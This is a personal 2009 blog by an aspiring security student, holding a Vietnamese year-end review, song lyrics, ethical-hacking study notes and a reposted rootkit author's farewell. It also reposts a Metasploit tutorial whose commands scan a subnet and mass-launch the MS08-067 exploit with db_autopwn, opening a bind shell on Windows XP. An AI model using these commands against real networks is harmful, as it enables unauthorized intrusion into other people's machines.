Wednesday, December 30, 2009

Nam 2009


  1. GD
- Gia dinh nen tang minh da co su hau thuan, giup do cua ong ba, bo me, co gi chu bac anh chi em. Nhung van con nhieu bat cap doi voi ca nhan nhu cach cu xu, tinh huong, tinh ca nhan hoa, van de xay ra nhieu van la tinh cach ngang nganh, ngu dot. co le cai toi kha to chang. Con xin loi bo me nhieu va con cam on a
  1. BB
- Da gap da co nhung nguoi ban tot: Cuong du, Canh suu, Vu phon, Thanh am, Thien tro...va nhung nguoi ban cung hoc dh, nhung nguoi ban cong viec, nhung nguoi ban quen biet. Thanks
  1. TY
- Da gap mot so nguoi, tinh cam danh cho 1 ca the o Son La. Don gian vi do la em. Cam on em
  1. CV
- Da lam o OSP, da gap nhung nguoi ban moi, da gap mot so tinh huong trong cv. Tinh van chua tien bo duoc nhieu. Can phai co gang nhieu, nhieu hon nua
  1. HT & DOC
-         Da lam duoc mot so thu ve server 2008
-         Hoc them ve CEH, da tan cong duoc qua lo hong ms08-67
-         Da viet su dung nhieu ve Trojan
-         Viet xong cuon “Vach mat Virus”
-         Tieng Anh da doc hieu duoc nhieu ve chuyen nganh
-         Doc xong cuon Van hoa ruou, Binh phap Ton Tu
-         Nen tang networking van con chua biet j nhieu, nhat la mo hinh OSI va TCP/IP
-         Ve DNS van con mong lung, it duoc dong den.
-         Van de scanning dang con dang do trong viec xac dinh vulnerability va network
-   Moi thu mot it, thanh ra ko biet gi nhieu. Can xac dinh doc cuon sach nao xong cuon sach do, tranh deo cay giua duong

Va nam 2009 da sap qua di voi nhieu nhieu dang do, con nhieu van de chua lam dc, co nhieu dieu muon noi, muon boc lo, ban chat co huu, cai toi ca nhan...Can quy hoach lai, quy hoach lai tu dau

Chuc mung nam moi
Co gang nhieu hon vao moi duoc

Sunday, December 27, 2009

Toi mo

 
Toi mo mot chieu dong xa thom thom noi com voi canh ca
Liu xiu ngon den be be than yeu o do gia dinh sum vay

Toi mo mot ngay khong xa dua em ve tham chon que nha
Doi chan cham em khe buoc thong dong ngon gio thom mui huong dong




http://www.4shared.com/file/183004016/5e89b658/ToiMo.html
http://tailong.webng.com/toimo.mp3

It's also my dream
____________
:>)

Saturday, December 12, 2009

A General Guide

I see a article...so awesome! maybe.
But! Life... is filled with unexpected. :D

And this is article
       
A General Guide 


For learning, and learning how to do the challenges, for those newer members who want to learn.

A small portion of the challenges ask for minimal knowledge and little research on the problem at hand. The rest of them require that the user present some sort of knowledge, and apply it to the situation. The latter is the majority. While the later problems of each section undoubtedly involve more skill, the earlier problems are building blocks which are(?) designed not only to test your knowledge of the basic skills involved, but to help teach you good habits. Several of the problems deal with very specific details of certain aspects of the subjects covered within, creating a hindrance that may prevent the user from actually understanding what the challenge is trying to teach, which in turn causes them to attempt to memorize and regurgitate the methods used.

Learning requires research, or studying. You aren't actually beating the challenges unless you understand the fundamentals behind them. The first challenge that comes to mind is the Basic user agent challenge. It's very simple to read an article telling you to download a user agent switcher, and possibly how to configure it. With that however, you aren't learning how to do the challenge. You're being told how, required to think very little, and entirely missing the point of the challenge. After doing that challenge, can you explain to someone how user agents work, or why they're used? If you don't pick up on, not specifically user agents, these fundamental concepts that make the system work, you will find that it is very difficult to apply that knowledge later on. Many of the ideas contained in the challenges are minimalistic compared to the scope of the broader subjects that encase them. And all of them can be applied to much larger projects, constructive and destructive, that are entirely inaccessible without the correct knowledge.

A much more common (and threatening) hindrance; points. An extremely large number of users seem to want solely to get points. It is very difficult to be successful with that in mind. Rather than actually learning the information, they would find what would seem to be the simplest and fastest way available to solve the challenges; bothering other members for answers, or finding the direct answers through Google. Those who use those methods are only hurting themselves. It is important that you strive to learn as much as possible, rather than attempting to just beat the challenges. Generally, just attempting to beat the challenges will leave you 'stranded' later on with the more difficult challenges. No one is expected to speed through them all and get them done in a day, or even weeks. Take your time, learn what the problem is about, understand why the answer is the correct answer. Question it, challenge it. Don't submit your answers without knowing how they work. Guessing is generally a bad idea as well. You aren't in school, you aren't being timed and you get no grade for submitting an answer as fast as you can. You should take your time and not rush the problems, but rather attempt to understand them.

In consideration of the challenges it is definitely not bad to ask questions, or to ask for help. There are issues that aren't necessarily in the scope of certain problems, at your current level of comprehension. But there is an explicit difference between asking for help and asking for answers. Asking for a point in the right direction can benefit you greatly. Asking for an answer is admitting that you want points, but aren't willing to work for it. “If one seeks knowledge, one must be willing to learn”


~Sqwertle
http://www.hellboundhackers.org


Thanx!

Wednesday, November 11, 2009

The River Flows Frozen

To Moms!
I know ...But i can't forget

THE RIVER FLOWS FROZEN
=================

Like frozen leaves
We are falling
On to the soil so barren and cold

The rays of sun
No more warming
Our hearts now so cold

Through this field
Of the withered flowers
We go still one more time

The hidden beauty
Forever gone
The river's frozen once again

So came this time
When moonlight blackened my heart
I can't stand this pain

The chain is broken
It's tearing open my scars
I want to feel the flame...again

----Music----
The shine behind
The frozen stream
Reminds me of your eyes

The spark of hope
Still in my heart
Shall dreams become true under the ice


So came this time
When moonlight blackened my heart
I can't stand this pain

The chain is broken
It's tearing open my scars
I want to feel the flame...again

 http://www.4shared.com/file/150118056/2ce239bd/The_River_Flows_Frozen.html
http://www.4shared.com/file/150119731/592f7a78/TheRiverFlowsFrozen_Acoustic.html

Send to you a present is "The River Flows Frozen"! Good Luck and healthy for you
And Thanks :>)

Thursday, October 22, 2009

Methodology to study

To study course CEH need:

+ Share, discuss
+ Understand about malware
+ Understand about network system
+ Understand about network services
       - Ports
       - DNS, DHCP, DHCP Relay Agent, NAT, Port forwarding
       - ACL
       - Authentication (token, radius, LDAP)
       - Find vulnerability
       - Remember hacker process


Thanks VuongTrungThang about this methodology

Wednesday, October 21, 2009

Thanks for EP_X0FF

To EP_X0FF
I know you is  a expert about Rootkits. I like idea of you. I will try to learn about VR/RK, networking and Secure. Thanks
And I want copy article in your blog.


On the way to Microsoft
I was too busy during these two months to write something here or on forums. But as you can predict currently I have enough time to write some news ;) First we have finally deal with all problems and now our little collective is on the way to Microsoft. That is not a joke :) Since beginning of the 2007 we have a lot of contacts with Microsoft participants from the dev team. They were a really interested in our projects (at this time it was a Rootkit Unhooker and test rootkit Unreal) and they give to us opportunity to join their team. But all what we done this two year was a part of our big project called Secured Eye (SEye), in a two words this is project mix of software/hardware related to distributed calculations and virtualization technologies based on Vanderpool / Pacifica extensions. Not a Blue Pill. To be more correct some parts of SEye can be used as a pill for any kind of Blue Pill variations ;) Currently our collective is partially migrating to Wittenberg located in Germany where we will end our works on SEye. As you can guess all our source code and concept were sold to MS. This was happened in the beginning of November and includes all variants of our test programs, RkU, including last 4.1 version and SEye which is ready on 3/4. But this doesn’t mean that any kind of this code / technology will be used by corporation in near future in commercial products. More likely that no. Just remember - virtualization is a key to future.

Finally I want to greet all peoples who helped us in our little RK/ARK “Invisible War” during last two years, war which is successfully come to a logical end.

Greg Hoglund (thanks for the roots)
Joanna Rutkowska (you have given us a target)
Holy Father (hxdef master)
Authors of the BOOTKIT (you cool)
Mark Russinovich (great book and great tools)
Cardmagic and wowocock (thank you guys for your tool and ideas)
Gmer (buddy, no matter what was between us, thank you for your gmer)
Fyyre (you have known us at the same starting!)
Ms-Rem (he knows for what)
j0ker (for icq sessions, money is not everything in the life, but of course awesome part)
PJF (for making IceSword all these years)
EASTER (for the outstanding support, we will not forget)
SpannerITWks (for the RK/ARK challenge and support)
fcukdat (for providing us wonderful malware samples)
Elite (for support and understanding)
saso (being with us even after KAV stories)
steo (for supporting RkU)
Zhadum (your polymorphic engines was great)
Ratter (for reversing Unreal)
Bruno Eduardo (for wonderful translations of RkU)
Mixel (for support and translations)
FlowerCode (for support and translations)
firabc (you was with us during all this crazy years)
Error_Log (you should be more independent, especially from your new friend)
Twister (real bughunter of our RkU 3x)
n0name (for several ideas)
Cr4sh (for supporting us in some situations)
sww (using your company AVs since 1994 till now)
tnt17 (for supporting us)
ad_13 (for support us, your thanks will be transferred)
+ all who I forgotten to list

In the end I would like to say personal “no thanks” to the several members of the Russian-speaking shitty virusinfo.info conference and some other idiots from different places. Your waning minds was and is too weak to understand something ;)



Source: https://www.rootkit.com/blog.php?newsid=830

Once Again! I wanna say: Thank you!

Wednesday, October 7, 2009

Metasploit Mass Exploitation for Dummy

One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.

In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.


msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3


Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:


msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db


To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:


msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24


Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:


msf > db_autopwn -e -p -b -m ms08_067


Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.


msf > sessions -l
Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Source: http://blog.metasploit.com/2009/02/metasploit-mass-exploitation-for.html

Maybe! This Article only is basic. But let's trying


Enjoy! 

Friday, September 25, 2009

calm down

Oke! Calm down, calm down

Face it, Tai Long. We had a great run, but...now IT'S TIME to move on.

Searching a way for myself. Run for it

Don't worry for anything without doing

you're not alone anymore

I'm good at making friends.

Alright!

Monday, September 14, 2009

Ethical Hacking

Ethical hacking is why most of you are here. Although is is fun to play with hacking tools, studying for certification, although never intended to be an indicator of expert status, is a good place to start for a couple reasons.
         1. To Get Certified - Although you may not get a job specifically because you have an ethical hacking cert, it definitely seperates you from other candidates.
        2. To Learn Only - If you are only here to learn and NOT get certified, studying for the certs is still a good idea. The information is in a format that lends itself to learning the material whether or not you decide to take the exam.


Let's get going...

Thursday, September 10, 2009

The Gallery










Dark Tranquillity - The Gallery


Come and dance through my vanity's halls
(Welcome) Welcome to my exhibition 


Ornaments fall
The fate of my art condemned
and the creative seed
That grows to the tune of the harvest song
Embody my lifelong passion
Intertwine with the structures of my art
Those empty frames
Staring at me

...One lonely portrait
covers the love-starved canvas
In honour of the birthless rebellion within me
Every picture holds a tale
Every shade tells of a thousand words...

The artistry of living chaos
is pictured in the poet's tears
'Cause everything burns
The final concept
is all but a thought away

Be gone, you foul enchantress of decay
My thoughts and words will come to right
In my chambers where chaos conveys
Kneel down to my desire

Deep in the vaults of my carnal agony
Emptiness orchestration through colours

The gallery
to never return be my framework
Burning the trust
Burning my art

Chào mừng đến với phòng tranh , nơi trưng bày hiện thực đảo điên !

Với bức tranh bên trên chỉ là một tác phẩm điển hình trong toàn bộ các kiệt tác của Dark Tranquillity

Đối với tôi! những giai điệu, âm thanh đầy vẻ đẹp huyền bí của bóng đêm này không thể nào khác được, với những bức tranh có bố cục thật đặc sắc, đa dạng và không hề đơn điệu. thậm chí có những bức tranh còn pha nhiều màu giận dữ, cuồng nộ đan xen với sự màu sắc mềm mại, êm ái. Và hãy thử đi biết đâu bạn sẽ nhận ra vẻ đẹp từ cái tên thanh bình mà cũng đầy khát khao khám phá: "Sự tĩnh lặng của bóng đêm" 

Sunday, July 5, 2009

Newcome



Begin

+ Study about Deploy network

+ About Windows server 2008 and write report

+ About wireless and how security it?

+ About Policies

+ About prevent virus attach

....Now